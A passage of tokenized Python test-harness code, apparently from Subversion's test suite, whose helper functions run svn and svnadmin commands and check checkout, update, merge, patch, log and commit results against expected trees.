svnadmin_binary , expected_stderr , <NUM_LIT:0> , <NUM_LIT:1> , dump_file_content , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , repo_dir ) <EOL> verify . verify_outputs ( "<STR_LIT>" , None , errput , <EOL> None , expected_stderr ) <EOL> def run_and_verify_dump ( repo_dir , deltas = False ) : <EOL> "<STR_LIT>" <EOL> if deltas : <EOL> exit_code , output , errput = main . run_svnadmin ( '<STR_LIT>' , '<STR_LIT>' , <EOL> repo_dir ) <EOL> else : <EOL> exit_code , output , errput = main . run_svnadmin ( '<STR_LIT>' , repo_dir ) <EOL> verify . verify_outputs ( "<STR_LIT>" , output , errput , <EOL> verify . AnyOutput , verify . AnyOutput ) <EOL> return output <EOL> def run_and_verify_svnrdump ( dumpfile_content , expected_stdout , <EOL> expected_stderr , expected_exit , * varargs ) : <EOL> """<STR_LIT>""" <EOL> exit_code , output , err = main . run_svnrdump ( dumpfile_content , * varargs ) <EOL> if sys . platform == '<STR_LIT:win32>' : <EOL> err = map ( lambda x : x . replace ( '<STR_LIT:\r\n>' , '<STR_LIT:\n>' ) , err ) <EOL> for index , line in enumerate ( err [ : ] ) : <EOL> if re . search ( "<STR_LIT>" , line ) : <EOL> del err [ index ] <EOL> verify . verify_outputs ( "<STR_LIT>" , output , err , <EOL> expected_stdout , expected_stderr ) <EOL> verify . verify_exit_code ( "<STR_LIT>" , exit_code , expected_exit ) <EOL> return output <EOL> def run_and_verify_svnmucc ( message , expected_stdout , expected_stderr , <EOL> * varargs ) : <EOL> """<STR_LIT>""" <EOL> expected_exit = <NUM_LIT:0> <EOL> if expected_stderr is not None and expected_stderr != [ ] : <EOL> expected_exit = <NUM_LIT:1> <EOL> return run_and_verify_svnmucc2 ( message , expected_stdout , expected_stderr , <EOL> expected_exit , * varargs ) <EOL> def run_and_verify_svnmucc2 ( message , expected_stdout , expected_stderr , <EOL> expected_exit , * varargs ) : <EOL> """<STR_LIT>""" <EOL> exit_code , out , err = main . run_svnmucc ( * varargs ) <EOL> verify . 
verify_outputs ( "<STR_LIT>" , out , err , <EOL> expected_stdout , expected_stderr ) <EOL> verify . verify_exit_code ( message , exit_code , expected_exit ) <EOL> return exit_code , out , err <EOL> def load_repo ( sbox , dumpfile_path = None , dump_str = None , <EOL> bypass_prop_validation = False ) : <EOL> "<STR_LIT>" <EOL> if not dump_str : <EOL> dump_str = open ( dumpfile_path , "<STR_LIT:rb>" ) . read ( ) <EOL> main . safe_rmtree ( sbox . repo_dir , <NUM_LIT:1> ) <EOL> main . safe_rmtree ( sbox . wc_dir , <NUM_LIT:1> ) <EOL> main . create_repos ( sbox . repo_dir ) <EOL> run_and_verify_load ( sbox . repo_dir , dump_str . splitlines ( True ) , <EOL> bypass_prop_validation ) <EOL> run_and_verify_svn ( None , None , [ ] , "<STR_LIT>" , sbox . repo_url , sbox . wc_dir ) <EOL> return dump_str <EOL> def expected_noop_update_output ( rev ) : <EOL> """<STR_LIT>""" <EOL> return verify . createExpectedOutput ( "<STR_LIT>" <EOL> % ( rev ) , <EOL> "<STR_LIT>" ) <EOL> def run_and_verify_checkout2 ( do_remove , <EOL> URL , wc_dir_name , output_tree , disk_tree , <EOL> singleton_handler_a = None , <EOL> a_baton = None , <EOL> singleton_handler_b = None , <EOL> b_baton = None , <EOL> * args ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( output_tree , wc . State ) : <EOL> output_tree = output_tree . old_tree ( ) <EOL> if isinstance ( disk_tree , wc . State ) : <EOL> disk_tree = disk_tree . old_tree ( ) <EOL> if do_remove : <EOL> main . safe_rmtree ( wc_dir_name ) <EOL> exit_code , output , errput = main . run_svn ( None , '<STR_LIT>' , <EOL> URL , wc_dir_name , * args ) <EOL> actual = tree . build_tree_from_checkout ( output ) <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , actual , output_tree ) <EOL> except tree . SVNTreeUnequal : <EOL> _log_tree_state ( "<STR_LIT>" , actual , wc_dir_name ) <EOL> raise <EOL> actual = tree . build_tree_from_wc ( wc_dir_name ) <EOL> try : <EOL> tree . 
compare_trees ( "<STR_LIT>" , actual , disk_tree , <EOL> singleton_handler_a , a_baton , <EOL> singleton_handler_b , b_baton ) <EOL> except tree . SVNTreeUnequal : <EOL> _log_tree_state ( "<STR_LIT>" , actual , wc_dir_name ) <EOL> raise <EOL> def run_and_verify_checkout ( URL , wc_dir_name , output_tree , disk_tree , <EOL> singleton_handler_a = None , <EOL> a_baton = None , <EOL> singleton_handler_b = None , <EOL> b_baton = None , <EOL> * args ) : <EOL> """<STR_LIT>""" <EOL> return run_and_verify_checkout2 ( ( '<STR_LIT>' not in args ) , <EOL> URL , wc_dir_name , output_tree , disk_tree , <EOL> singleton_handler_a , <EOL> a_baton , <EOL> singleton_handler_b , <EOL> b_baton , <EOL> * args ) <EOL> def run_and_verify_export ( URL , export_dir_name , output_tree , disk_tree , <EOL> * args ) : <EOL> """<STR_LIT>""" <EOL> assert isinstance ( output_tree , wc . State ) <EOL> assert isinstance ( disk_tree , wc . State ) <EOL> disk_tree = disk_tree . old_tree ( ) <EOL> output_tree = output_tree . old_tree ( ) <EOL> exit_code , output , errput = main . run_svn ( None , '<STR_LIT>' , <EOL> URL , export_dir_name , * args ) <EOL> actual = tree . build_tree_from_checkout ( output ) <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , actual , output_tree ) <EOL> except tree . SVNTreeUnequal : <EOL> _log_tree_state ( "<STR_LIT>" , actual , export_dir_name ) <EOL> raise <EOL> actual = tree . build_tree_from_wc ( export_dir_name , ignore_svn = False ) <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , actual , disk_tree ) <EOL> except tree . SVNTreeUnequal : <EOL> _log_tree_state ( "<STR_LIT>" , actual , export_dir_name ) <EOL> raise <EOL> class LogEntry : <EOL> def __init__ ( self , revision , changed_paths = None , revprops = None ) : <EOL> self . revision = revision <EOL> if changed_paths == None : <EOL> self . changed_paths = { } <EOL> else : <EOL> self . changed_paths = changed_paths <EOL> if revprops == None : <EOL> self . revprops = { } <EOL> else : <EOL> self . 
revprops = revprops <EOL> def assert_changed_paths ( self , changed_paths ) : <EOL> """<STR_LIT>""" <EOL> if self . changed_paths != changed_paths : <EOL> raise Failure ( '<STR_LIT:\n>' + '<STR_LIT:\n>' . join ( difflib . ndiff ( <EOL> pprint . pformat ( changed_paths ) . splitlines ( ) , <EOL> pprint . pformat ( self . changed_paths ) . splitlines ( ) ) ) ) <EOL> def assert_revprops ( self , revprops ) : <EOL> """<STR_LIT>""" <EOL> if self . revprops != revprops : <EOL> raise Failure ( '<STR_LIT:\n>' + '<STR_LIT:\n>' . join ( difflib . ndiff ( <EOL> pprint . pformat ( revprops ) . splitlines ( ) , <EOL> pprint . pformat ( self . revprops ) . splitlines ( ) ) ) ) <EOL> class LogParser : <EOL> def parse ( self , data ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> for i in data : <EOL> self . parser . Parse ( i ) <EOL> self . parser . Parse ( '<STR_LIT>' , True ) <EOL> except xml . parsers . expat . ExpatError , e : <EOL> raise verify . SVNUnexpectedStdout ( '<STR_LIT>' % ( e , '<STR_LIT>' . join ( data ) , ) ) <EOL> return self . entries <EOL> def __init__ ( self ) : <EOL> self . parser = xml . parsers . expat . ParserCreate ( ) <EOL> self . parser . StartElementHandler = self . handle_start_element <EOL> self . parser . EndElementHandler = self . handle_end_element <EOL> self . parser . CharacterDataHandler = self . handle_character_data <EOL> self . ignore_elements ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . ignore_tags ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . cdata = [ ] <EOL> self . property = None <EOL> self . kind = None <EOL> self . action = None <EOL> self . entries = [ ] <EOL> def ignore ( self , * args , ** kwargs ) : <EOL> del self . cdata [ : ] <EOL> def ignore_tags ( self , * args ) : <EOL> for tag in args : <EOL> setattr ( self , tag , self . ignore ) <EOL> def ignore_elements ( self , * args ) : <EOL> for element in args : <EOL> self . 
ignore_tags ( element + '<STR_LIT>' , element + '<STR_LIT>' ) <EOL> def handle_start_element ( self , name , attrs ) : <EOL> getattr ( self , name + '<STR_LIT>' ) ( attrs ) <EOL> def handle_end_element ( self , name ) : <EOL> getattr ( self , name + '<STR_LIT>' ) ( ) <EOL> def handle_character_data ( self , data ) : <EOL> self . cdata . append ( data ) <EOL> def use_cdata ( self ) : <EOL> result = '<STR_LIT>' . join ( self . cdata ) . strip ( ) <EOL> del self . cdata [ : ] <EOL> return result <EOL> def svn_prop ( self , name ) : <EOL> self . entries [ - <NUM_LIT:1> ] . revprops [ '<STR_LIT>' + name ] = self . use_cdata ( ) <EOL> def logentry_start ( self , attrs ) : <EOL> self . entries . append ( LogEntry ( int ( attrs [ '<STR_LIT>' ] ) ) ) <EOL> def author_end ( self ) : <EOL> self . svn_prop ( '<STR_LIT>' ) <EOL> def msg_end ( self ) : <EOL> self . svn_prop ( '<STR_LIT>' ) <EOL> def date_end ( self ) : <EOL> self . cdata [ : ] = [ '<STR_LIT>' ] <EOL> self . svn_prop ( '<STR_LIT:date>' ) <EOL> def property_start ( self , attrs ) : <EOL> self . property = attrs [ '<STR_LIT:name>' ] <EOL> def property_end ( self ) : <EOL> self . entries [ - <NUM_LIT:1> ] . revprops [ self . property ] = self . use_cdata ( ) <EOL> def path_start ( self , attrs ) : <EOL> self . kind = attrs [ '<STR_LIT>' ] <EOL> self . action = attrs [ '<STR_LIT:action>' ] <EOL> def path_end ( self ) : <EOL> self . entries [ - <NUM_LIT:1> ] . changed_paths [ self . use_cdata ( ) ] = [ { '<STR_LIT>' : self . kind , <EOL> '<STR_LIT:action>' : self . action } ] <EOL> def run_and_verify_log_xml ( message = None , expected_paths = None , <EOL> expected_revprops = None , expected_stdout = None , <EOL> expected_stderr = None , args = [ ] ) : <EOL> """<STR_LIT>""" <EOL> if message == None : <EOL> message = '<STR_LIT:U+0020>' . 
join ( args ) <EOL> parse = True <EOL> if expected_stderr == None : <EOL> expected_stderr = [ ] <EOL> else : <EOL> parse = False <EOL> if expected_stdout != None : <EOL> parse = False <EOL> log_args = list ( args ) <EOL> if expected_paths != None : <EOL> log_args . append ( '<STR_LIT>' ) <EOL> ( exit_code , stdout , stderr ) = run_and_verify_svn ( <EOL> message , expected_stdout , expected_stderr , <EOL> '<STR_LIT>' , '<STR_LIT>' , * log_args ) <EOL> if not parse : <EOL> return <EOL> entries = LogParser ( ) . parse ( stdout ) <EOL> for index in range ( len ( entries ) ) : <EOL> entry = entries [ index ] <EOL> if expected_revprops != None : <EOL> entry . assert_revprops ( expected_revprops [ index ] ) <EOL> if expected_paths != None : <EOL> entry . assert_changed_paths ( expected_paths [ index ] ) <EOL> def verify_update ( actual_output , <EOL> actual_mergeinfo_output , <EOL> actual_elision_output , <EOL> wc_dir_name , <EOL> output_tree , <EOL> mergeinfo_output_tree , <EOL> elision_output_tree , <EOL> disk_tree , <EOL> status_tree , <EOL> singleton_handler_a = None , <EOL> a_baton = None , <EOL> singleton_handler_b = None , <EOL> b_baton = None , <EOL> check_props = False ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( actual_output , wc . State ) : <EOL> actual_output = actual_output . old_tree ( ) <EOL> if isinstance ( actual_mergeinfo_output , wc . State ) : <EOL> actual_mergeinfo_output = actual_mergeinfo_output . old_tree ( ) <EOL> if isinstance ( actual_elision_output , wc . State ) : <EOL> actual_elision_output = actual_elision_output . old_tree ( ) <EOL> if isinstance ( output_tree , wc . State ) : <EOL> output_tree = output_tree . old_tree ( ) <EOL> if isinstance ( mergeinfo_output_tree , wc . State ) : <EOL> mergeinfo_output_tree = mergeinfo_output_tree . old_tree ( ) <EOL> if isinstance ( elision_output_tree , wc . State ) : <EOL> elision_output_tree = elision_output_tree . old_tree ( ) <EOL> if isinstance ( disk_tree , wc . 
State ) : <EOL> disk_tree = disk_tree . old_tree ( ) <EOL> if isinstance ( status_tree , wc . State ) : <EOL> status_tree = status_tree . old_tree ( ) <EOL> if output_tree : <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , actual_output , output_tree ) <EOL> except tree . SVNTreeUnequal : <EOL> _log_tree_state ( "<STR_LIT>" , actual_output , wc_dir_name ) <EOL> raise <EOL> if mergeinfo_output_tree : <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , actual_mergeinfo_output , <EOL> mergeinfo_output_tree ) <EOL> except tree . SVNTreeUnequal : <EOL> _log_tree_state ( "<STR_LIT>" , actual_mergeinfo_output , <EOL> wc_dir_name ) <EOL> raise <EOL> if elision_output_tree : <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , actual_elision_output , <EOL> elision_output_tree ) <EOL> except tree . SVNTreeUnequal : <EOL> _log_tree_state ( "<STR_LIT>" , actual_elision_output , <EOL> wc_dir_name ) <EOL> raise <EOL> if disk_tree : <EOL> actual_disk = tree . build_tree_from_wc ( wc_dir_name , check_props ) <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , actual_disk , disk_tree , <EOL> singleton_handler_a , a_baton , <EOL> singleton_handler_b , b_baton ) <EOL> except tree . 
SVNTreeUnequal : <EOL> _log_tree_state ( "<STR_LIT>" , disk_tree ) <EOL> _log_tree_state ( "<STR_LIT>" , actual_disk ) <EOL> raise <EOL> if status_tree : <EOL> run_and_verify_status ( wc_dir_name , status_tree ) <EOL> def verify_disk ( wc_dir_name , disk_tree , check_props = False ) : <EOL> """<STR_LIT>""" <EOL> verify_update ( None , None , None , wc_dir_name , None , None , None , disk_tree , <EOL> None , check_props = check_props ) <EOL> def run_and_verify_update ( wc_dir_name , <EOL> output_tree , disk_tree , status_tree , <EOL> error_re_string = None , <EOL> singleton_handler_a = None , <EOL> a_baton = None , <EOL> singleton_handler_b = None , <EOL> b_baton = None , <EOL> check_props = False , <EOL> * args ) : <EOL> """<STR_LIT>""" <EOL> if len ( args ) : <EOL> exit_code , output , errput = main . run_svn ( error_re_string , '<STR_LIT>' , * args ) <EOL> else : <EOL> exit_code , output , errput = main . run_svn ( error_re_string , <EOL> '<STR_LIT>' , wc_dir_name , <EOL> * args ) <EOL> if error_re_string : <EOL> rm = re . compile ( error_re_string ) <EOL> for line in errput : <EOL> match = rm . search ( line ) <EOL> if match : <EOL> return <EOL> raise main . SVNUnmatchedError <EOL> actual = wc . State . from_checkout ( output ) <EOL> verify_update ( actual , None , None , wc_dir_name , <EOL> output_tree , None , None , disk_tree , status_tree , <EOL> singleton_handler_a , a_baton , <EOL> singleton_handler_b , b_baton , <EOL> check_props ) <EOL> def run_and_parse_info ( * args ) : <EOL> """<STR_LIT>""" <EOL> all_infos = [ ] <EOL> iter_info = { } <EOL> prev_key = None <EOL> lock_comment_lines = <NUM_LIT:0> <EOL> lock_comments = [ ] <EOL> exit_code , output , errput = main . run_svn ( None , '<STR_LIT:info>' , * args ) <EOL> for line in output : <EOL> line = line [ : - <NUM_LIT:1> ] <EOL> if lock_comment_lines > <NUM_LIT:0> : <EOL> lock_comments . 
append ( line ) <EOL> lock_comment_lines = lock_comment_lines - <NUM_LIT:1> <EOL> if lock_comment_lines == <NUM_LIT:0> : <EOL> iter_info [ prev_key ] = lock_comments <EOL> elif len ( line ) == <NUM_LIT:0> : <EOL> all_infos . append ( iter_info ) <EOL> iter_info = { } <EOL> prev_key = None <EOL> lock_comment_lines = <NUM_LIT:0> <EOL> lock_comments = [ ] <EOL> elif line [ <NUM_LIT:0> ] . isspace ( ) : <EOL> iter_info [ prev_key ] += line [ <NUM_LIT:1> : ] <EOL> else : <EOL> key , value = line . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> if re . search ( '<STR_LIT>' , key ) : <EOL> match = re . match ( '<STR_LIT>' , key ) <EOL> key = match . group ( <NUM_LIT:1> ) <EOL> lock_comment_lines = int ( match . group ( <NUM_LIT:2> ) ) <EOL> elif len ( value ) > <NUM_LIT:1> : <EOL> iter_info [ key ] = value [ <NUM_LIT:1> : ] <EOL> else : <EOL> iter_info [ key ] = '<STR_LIT>' <EOL> prev_key = key <EOL> return all_infos <EOL> def run_and_verify_info ( expected_infos , * args ) : <EOL> """<STR_LIT>""" <EOL> actual_infos = run_and_parse_info ( * args ) <EOL> actual_infos . sort ( key = lambda info : info [ '<STR_LIT>' ] ) <EOL> try : <EOL> if len ( actual_infos ) != len ( expected_infos ) : <EOL> raise verify . SVNUnexpectedStdout ( <EOL> "<STR_LIT>" <EOL> % ( len ( expected_infos ) , len ( actual_infos ) ) ) <EOL> for actual , expected in zip ( actual_infos , expected_infos ) : <EOL> for key , value in expected . items ( ) : <EOL> assert '<STR_LIT::>' not in key <EOL> if value is None and key in actual : <EOL> raise main . SVNLineUnequal ( "<STR_LIT>" <EOL> % ( key , actual [ key ] ) ) <EOL> if value is not None and key not in actual : <EOL> raise main . SVNLineUnequal ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( key , value ) ) <EOL> if value is not None and not re . match ( value , actual [ key ] ) : <EOL> raise verify . SVNUnexpectedStdout ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( key , value , actual [ key ] ) ) <EOL> except : <EOL> sys . stderr . 
write ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( actual_infos , expected_infos ) ) <EOL> raise <EOL> def run_and_verify_merge ( dir , rev1 , rev2 , url1 , url2 , <EOL> output_tree , <EOL> mergeinfo_output_tree , <EOL> elision_output_tree , <EOL> disk_tree , status_tree , skip_tree , <EOL> error_re_string = None , <EOL> singleton_handler_a = None , <EOL> a_baton = None , <EOL> singleton_handler_b = None , <EOL> b_baton = None , <EOL> check_props = False , <EOL> dry_run = True , <EOL> * args ) : <EOL> """<STR_LIT>""" <EOL> merge_command = [ "<STR_LIT>" ] <EOL> if url2 : <EOL> merge_command . extend ( ( url1 + "<STR_LIT:@>" + str ( rev1 ) , url2 + "<STR_LIT:@>" + str ( rev2 ) ) ) <EOL> else : <EOL> if not ( rev1 is None and rev2 is None ) : <EOL> merge_command . append ( "<STR_LIT>" + str ( rev1 ) + "<STR_LIT::>" + str ( rev2 ) ) <EOL> merge_command . append ( url1 ) <EOL> if len ( args ) == <NUM_LIT:0> : <EOL> merge_command . append ( dir ) <EOL> merge_command = tuple ( merge_command ) <EOL> if dry_run : <EOL> pre_disk = tree . build_tree_from_wc ( dir ) <EOL> dry_run_command = merge_command + ( '<STR_LIT>' , ) <EOL> dry_run_command = dry_run_command + args <EOL> exit_code , out_dry , err_dry = main . run_svn ( error_re_string , <EOL> * dry_run_command ) <EOL> post_disk = tree . build_tree_from_wc ( dir ) <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , post_disk , pre_disk ) <EOL> except tree . SVNTreeError : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> raise <EOL> merge_command = merge_command + args <EOL> exit_code , out , err = main . run_svn ( error_re_string , * merge_command ) <EOL> if error_re_string : <EOL> if not error_re_string . startswith ( "<STR_LIT>" ) : <EOL> error_re_string = "<STR_LIT>" + error_re_string + "<STR_LIT:)>" <EOL> expected_err = verify . RegexOutput ( error_re_string , match_all = False ) <EOL> verify . 
verify_outputs ( None , None , err , None , expected_err ) <EOL> return <EOL> elif err : <EOL> raise verify . SVNUnexpectedStderr ( err ) <EOL> merge_diff_out = [ ] <EOL> mergeinfo_notification_out = [ ] <EOL> mergeinfo_elision_out = [ ] <EOL> mergeinfo_notifications = False <EOL> elision_notifications = False <EOL> for line in out : <EOL> if line . startswith ( '<STR_LIT>' ) : <EOL> mergeinfo_notifications = True <EOL> elision_notifications = False <EOL> elif line . startswith ( '<STR_LIT>' ) : <EOL> mergeinfo_notifications = False <EOL> elision_notifications = True <EOL> elif line . startswith ( '<STR_LIT>' ) or line . startswith ( '<STR_LIT>' ) or line . startswith ( '<STR_LIT>' ) or line . startswith ( '<STR_LIT>' ) : <EOL> mergeinfo_notifications = False <EOL> elision_notifications = False <EOL> if mergeinfo_notifications : <EOL> mergeinfo_notification_out . append ( line ) <EOL> elif elision_notifications : <EOL> mergeinfo_elision_out . append ( line ) <EOL> else : <EOL> merge_diff_out . append ( line ) <EOL> if dry_run and merge_diff_out != out_dry : <EOL> out_copy = set ( merge_diff_out [ : ] ) <EOL> out_dry_copy = set ( out_dry [ : ] ) <EOL> if out_copy != out_dry_copy : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> for x in out_dry : <EOL> logger . warn ( x ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> for x in out : <EOL> logger . warn ( x ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> raise main . SVNUnmatchedError <EOL> def missing_skip ( a , b ) : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> logger . warn ( "<STR_LIT>" , a . path ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> raise Failure <EOL> def extra_skip ( a , b ) : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> logger . warn ( "<STR_LIT>" , a . path ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> raise Failure <EOL> myskiptree = tree . build_tree_from_skipped ( out ) <EOL> if isinstance ( skip_tree , wc . State ) : <EOL> skip_tree = skip_tree . 
old_tree ( ) <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , myskiptree , skip_tree , <EOL> extra_skip , None , missing_skip , None ) <EOL> except tree . SVNTreeUnequal : <EOL> _log_tree_state ( "<STR_LIT>" , myskiptree , dir ) <EOL> raise <EOL> actual_diff = svntest . wc . State . from_checkout ( merge_diff_out , False ) <EOL> actual_mergeinfo = svntest . wc . State . from_checkout ( mergeinfo_notification_out , <EOL> False ) <EOL> actual_elision = svntest . wc . State . from_checkout ( mergeinfo_elision_out , <EOL> False ) <EOL> verify_update ( actual_diff , actual_mergeinfo , actual_elision , dir , <EOL> output_tree , mergeinfo_output_tree , elision_output_tree , <EOL> disk_tree , status_tree , <EOL> singleton_handler_a , a_baton , <EOL> singleton_handler_b , b_baton , <EOL> check_props ) <EOL> def run_and_verify_patch ( dir , patch_path , <EOL> output_tree , disk_tree , status_tree , skip_tree , <EOL> error_re_string = None , <EOL> check_props = False , <EOL> dry_run = True , <EOL> * args ) : <EOL> """<STR_LIT>""" <EOL> patch_command = [ "<STR_LIT>" ] <EOL> patch_command . append ( patch_path ) <EOL> patch_command . append ( dir ) <EOL> patch_command = tuple ( patch_command ) <EOL> if dry_run : <EOL> pre_disk = tree . build_tree_from_wc ( dir ) <EOL> dry_run_command = patch_command + ( '<STR_LIT>' , ) <EOL> dry_run_command = dry_run_command + args <EOL> exit_code , out_dry , err_dry = main . run_svn ( error_re_string , <EOL> * dry_run_command ) <EOL> post_disk = tree . build_tree_from_wc ( dir ) <EOL> try : <EOL> tree . compare_trees ( "<STR_LIT>" , post_disk , pre_disk ) <EOL> except tree . SVNTreeError : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> raise <EOL> patch_command = patch_command + args <EOL> exit_code , out , err = main . run_svn ( True , * patch_command ) <EOL> if error_re_string : <EOL> rm = re . 
compile ( error_re_string ) <EOL> match = None <EOL> for line in err : <EOL> match = rm . search ( line ) <EOL> if match : <EOL> break <EOL> if not match : <EOL> raise main . SVNUnmatchedError <EOL> elif err : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> for x in err : <EOL> logger . warn ( x ) <EOL> raise verify . SVNUnexpectedStderr <EOL> if dry_run and out != out_dry : <EOL> out_dry_expected = svntest . verify . UnorderedOutput ( out ) <EOL> verify . compare_and_display_lines ( '<STR_LIT>' , <EOL> '<STR_LIT>' , out_dry_expected , out_dry ) <EOL> def missing_skip ( a , b ) : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> logger . warn ( "<STR_LIT>" , a . path ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> raise Failure <EOL> def extra_skip ( a , b ) : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> logger . warn ( "<STR_LIT>" , a . path ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> raise Failure <EOL> myskiptree = tree . build_tree_from_skipped ( out ) <EOL> if isinstance ( skip_tree , wc . State ) : <EOL> skip_tree = skip_tree . old_tree ( ) <EOL> tree . compare_trees ( "<STR_LIT>" , myskiptree , skip_tree , <EOL> extra_skip , None , missing_skip , None ) <EOL> mytree = tree . build_tree_from_checkout ( out , <NUM_LIT:0> ) <EOL> if ( isinstance ( output_tree , list ) <EOL> or isinstance ( output_tree , verify . UnorderedOutput ) ) : <EOL> verify . verify_outputs ( None , out , err , output_tree , error_re_string ) <EOL> output_tree = None <EOL> verify_update ( mytree , None , None , dir , <EOL> output_tree , None , None , disk_tree , status_tree , <EOL> check_props = check_props ) <EOL> def run_and_verify_mergeinfo ( error_re_string = None , <EOL> expected_output = [ ] , <EOL> * args ) : <EOL> """<STR_LIT>""" <EOL> mergeinfo_command = [ "<STR_LIT>" ] <EOL> mergeinfo_command . extend ( args ) <EOL> exit_code , out , err = main . run_svn ( error_re_string , * mergeinfo_command ) <EOL> if error_re_string : <EOL> if not error_re_string . 
startswith ( "<STR_LIT>" ) : <EOL> error_re_string = "<STR_LIT>" + error_re_string + "<STR_LIT:)>" <EOL> expected_err = verify . RegexOutput ( error_re_string , match_all = False ) <EOL> verify . verify_outputs ( None , None , err , None , expected_err ) <EOL> return <EOL> out = [ _f for _f in [ x . rstrip ( ) [ <NUM_LIT:1> : ] for x in out ] if _f ] <EOL> expected_output . sort ( ) <EOL> extra_out = [ ] <EOL> if out != expected_output : <EOL> exp_hash = dict . fromkeys ( expected_output ) <EOL> for rev in out : <EOL> if rev in exp_hash : <EOL> del ( exp_hash [ rev ] ) <EOL> else : <EOL> extra_out . append ( rev ) <EOL> extra_exp = list ( exp_hash . keys ( ) ) <EOL> raise Exception ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( '<STR_LIT:U+002CU+0020>' . join ( [ str ( x ) for x in extra_exp ] ) , <EOL> '<STR_LIT:U+002CU+0020>' . join ( [ str ( x ) for x in extra_out ] ) ) ) <EOL> def run_and_verify_switch ( wc_dir_name , <EOL> wc_target , <EOL> switch_url , <EOL> output_tree , disk_tree , status_tree , <EOL> error_re_string = None , <EOL> singleton_handler_a = None , <EOL> a_baton = None , <EOL> singleton_handler_b = None , <EOL> b_baton = None , <EOL> check_props = False , <EOL> * args ) : <EOL> """<STR_LIT>""" <EOL> exit_code , output , errput = main . run_svn ( error_re_string , '<STR_LIT>' , <EOL> switch_url , wc_target , * args ) <EOL> if error_re_string : <EOL> if not error_re_string . startswith ( "<STR_LIT>" ) : <EOL> error_re_string = "<STR_LIT>" + error_re_string + "<STR_LIT:)>" <EOL> expected_err = verify . RegexOutput ( error_re_string , match_all = False ) <EOL> verify . verify_outputs ( None , None , errput , None , expected_err ) <EOL> return <EOL> elif errput : <EOL> raise verify . SVNUnexpectedStderr ( err ) <EOL> actual = wc . State . 
from_checkout ( output ) <EOL> verify_update ( actual , None , None , wc_dir_name , <EOL> output_tree , None , None , disk_tree , status_tree , <EOL> singleton_handler_a , a_baton , <EOL> singleton_handler_b , b_baton , <EOL> check_props ) <EOL> def process_output_for_commit ( output ) : <EOL> """<STR_LIT>""" <EOL> lastline = "<STR_LIT>" <EOL> rest = [ ] <EOL> def external_removal ( line ) : <EOL> return line . startswith ( '<STR_LIT>' ) or line . startswith ( '<STR_LIT>' ) <EOL> if len ( output ) : <EOL> lastline = output . pop ( ) . strip ( ) <EOL> while len ( output ) and external_removal ( lastline ) : <EOL> rest . append ( lastline ) <EOL> lastline = output . pop ( ) . strip ( ) <EOL> cm = re . compile ( "<STR_LIT>" ) <EOL> match = cm . search ( lastline ) <EOL> if not match : <EOL> logger . warn ( "<STR_LIT>" ) <EOL> logger . warn ( "<STR_LIT>" ) <EOL> logger . warn ( lastline ) <EOL> raise main . SVNCommitFailure <EOL> if len ( output ) : <EOL> lastline = output . pop ( ) <EOL> tm = re . compile ( "<STR_LIT>" ) <EOL> match = tm . search ( lastline ) <EOL> if not match : <EOL> output . append ( lastline ) <EOL> if len ( rest ) : <EOL> output . extend ( rest ) <EOL> return output <EOL> def run_and_verify_commit ( wc_dir_name , output_tree , status_tree , <EOL> error_re_string = None , <EOL> * args ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( output_tree , wc . State ) : <EOL> output_tree = output_tree . old_tree ( ) <EOL> if isinstance ( status_tree , wc . State ) : <EOL> status_tree = status_tree . old_tree ( ) <EOL> if '<STR_LIT>' not in args and '<STR_LIT>' not in args : <EOL> args = list ( args ) + [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> exit_code , output , errput = main . run_svn ( error_re_string , '<STR_LIT>' , <EOL> * args ) <EOL> if error_re_string : <EOL> if not error_re_string . startswith ( "<STR_LIT>" ) : <EOL> error_re_string = "<STR_LIT>" + error_re_string + "<STR_LIT:)>" <EOL> expected_err = verify . 
